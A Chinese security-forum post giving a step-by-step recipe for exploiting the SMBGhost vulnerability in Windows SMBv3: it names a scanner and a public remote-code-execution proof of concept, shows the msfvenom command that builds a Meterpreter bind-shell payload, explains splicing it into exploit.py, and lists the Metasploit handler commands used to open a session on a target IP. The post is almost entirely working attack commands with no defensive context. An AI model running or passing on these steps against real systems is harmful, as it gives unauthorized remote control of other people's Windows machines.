名称 简介 添加时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考
详情
作者:Candy 发表于[2023-08-24]

本文共 [77] 位读者顶过

1.扫描:先通过工具扫描目标机是否存在漏洞
工具  https://github.com/ollypwn/SMBGhost
[出自:jiwo.org]
2.下载rce工具包
GitHub - chompie1337/SMBGhost_RCE_PoC
3.用kali生成一个payload
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

4.生成好之后将生成的所有buf字段修改为USER_PAYLOAD.

5.然后替换到exploit.py文件中的USER_PAYLOAD字段中。

6.开启kali监听
use exploit/multi/handler
set payload windows/x64/meterperter/bind_tcp
set lport 4444
set rhost 192.168.19.130
run

7.运行exp
python3 exploit.py -ip 目标ip

8.等待msf主动连接,稍等即可创建session


---------------------------------------------------------------------------------------------------------------
左上角导航栏那么明显的“下载”按链接你看不见,那就点这儿 下载 吧!

评论

暂无
发表评论
 返回顶部 
热度(77)
 关注微信